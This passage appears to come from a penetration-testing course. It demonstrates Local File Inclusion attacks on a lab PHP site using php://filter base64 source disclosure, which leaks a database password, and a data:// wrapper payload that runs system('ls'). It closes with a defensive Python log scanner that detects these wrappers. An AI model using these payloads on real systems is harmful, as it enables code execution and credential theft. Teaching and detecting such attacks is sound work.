PHP offers a variety of protocol wrappers to extend the language's capabilities. For example, PHP wrappers can be used to represent and access local or remote file systems. We can use these wrappers to bypass filters or obtain code execution via File Inclusion vulnerabilities in PHP web applications. While we will only examine the php://filter and data:// wrappers, many others exist.
With the php://filter wrapper we can display the contents of files with or without encodings such as ROT13 or Base64. In the previous section we used LFI to include the contents of files. With php://filter we can display the contents of executable files such as .php rather than executing them. This allows us to review PHP files for sensitive information and analyze the web application's logic.
Let's demonstrate this by returning to the Mountain Desserts web application. First, as in the previous learning unit, we'll provide admin.php as the value for the page parameter.
kali@kali:~$ **curl http://mountaindesserts.com/meteor/index.php?page=admin.php**
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Maintenance</title>
</head>
<body>
<span style="color:#F00;text-align:center;">The admin page is currently under maintenance.
Listing 20 - Contents of admin.php
Listing 20 shows the title and the maintenance text we encountered when we first reviewed the web application. We also notice that the <body> tag in the HTML code is not closed at the end, so we can assume something is missing. PHP code is executed server-side and is therefore not displayed. If we compare this output with previous inclusions, or view the page source in a browser, we can conclude that the rest of the index.php page is missing.
Now let's include the file using php://filter to better understand this situation. For our first attempt we won't use any encoding. The PHP wrapper uses the required resource parameter to specify the file name as the file stream to be filtered. We can specify absolute or relative paths in this parameter.
kali@kali:~$ **curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php**
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Maintenance</title>
</head>
<body>
<span style="color:#F00;text-align:center;">The admin page is currently under maintenance.
Listing 21 - Using "php://filter" to include admin.php unencoded
The output of Listing 21 shows the same result as Listing 20. This makes sense, since the PHP code is included and executed through the LFI vulnerability. Now let's add convert.base64-encode to base64-encode the output. This converts the specified resource into a base64 string.
kali@kali:~$ **curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php**
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
**PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbn...
dF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K**
...
Listing 22 - Using "php://filter" to include admin.php base64-encoded
Listing 22 shows that we included the base64-encoded data and that the rest of the page loaded correctly. We can now decode the encoded data in the terminal with the base64 program's -d flag.
kali@kali:~$ **echo "<base64-encoded string from Listing 22>" | base64 -d**
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Maintenance</title>
</head>
<body>
<?php echo '<span style="color:#F00;text-align:center;">The admin page is currently under maintenance.'; ?>
**<?php
$servername = "localhost";
$username = "root";
$password = "M00nK4keCard!2#";
// Create connection
$conn = new mysqli($servername, $username, $password);**
...
Listing 23 - Decoding the base64-encoded contents of admin.php
The decoded data contains MySQL connection information, including a username and password. We could use these credentials to connect to the database or to try the password against user accounts via SSH.
While the php://filter wrapper can be used to include the contents of files, the data:// wrapper can be used to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data into the running web application's code. It offers an alternative method when we are unable to poison a local file with PHP code.
Let's demonstrate how to use the data:// wrapper on the Mountain Desserts web application. To use the wrapper, we add data:// followed by the data type and the content. In our first example we'll try to embed a small URL-encoded PHP snippet into the web application's code. We can use the same PHP snippet with the ls command as before.
kali@kali:~$ **curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"**
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
admin.php
bavarian.php
css
fonts
img
index.php
js
...
Listing 24 - Using the "data://" wrapper to execute ls
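As an added defender-side example (not part of the course material above), the following Python script scans Apache access log lines for the two wrapper patterns seen in Listings 21-24: a php://filter chain carrying a conversion filter, and a data: wrapper carrying inline code. The log lines, IP addresses and the percent-encoded fifth request are constructed for this example; the script URL-decodes repeatedly so that encoded variants of the same wrappers are caught as well.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" access log lines modelled on the requests in
# Listings 21-24 (IPs, timestamps and the percent-encoded probe are made up).
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 612',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /meteor/index.php?page=php://filter/resource=admin.php HTTP/1.1" 200 612',
    '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 1480',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /meteor/index.php?page=data://text/plain,<?php%20echo%20system(\'ls\');?> HTTP/1.1" 200 702',
    '198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /meteor/index.php?page=PHP%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php HTTP/1.1" 200 1210',
    '198.51.100.9 - - [10/Oct/2023:13:57:00 +0000] "GET /meteor/index.php?page=bavarian.php HTTP/1.1" 200 900',
]

# Only the request line matters here: client IP, method, target and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded wrappers are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(raw_value):
    """Return a reason string if the parameter value is a PHP stream wrapper, else None."""
    v = decode_fully(raw_value).strip().lower()
    if v.startswith("php://filter") and "convert." in v:
        return "php://filter with conversion filter (source disclosure)"
    if v.startswith("php://"):
        return "php:// wrapper"
    if v.startswith("data:"):  # data://text/plain,... carries attacker-supplied code
        return "data: wrapper (inline code)"
    return None

def scan_access_log(lines):
    """Return (ip, status, param, raw_value, reason) for every suspicious query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _, _, query = m.group("target").partition("?")
        for pair in filter(None, query.split("&")):
            # Split on the first '=' only: values such as resource=admin.php contain '=' themselves.
            name, _, value = pair.partition("=")
            reason = classify(value)
            if reason:
                hits.append((m.group("ip"), int(m.group("status")), name, value, reason))
    return hits
```

Run against the constructed lines, the scan flags four of the six requests and leaves the two plain file names alone; the raw (still encoded) value is kept in each hit so the evidence matches the log byte for byte.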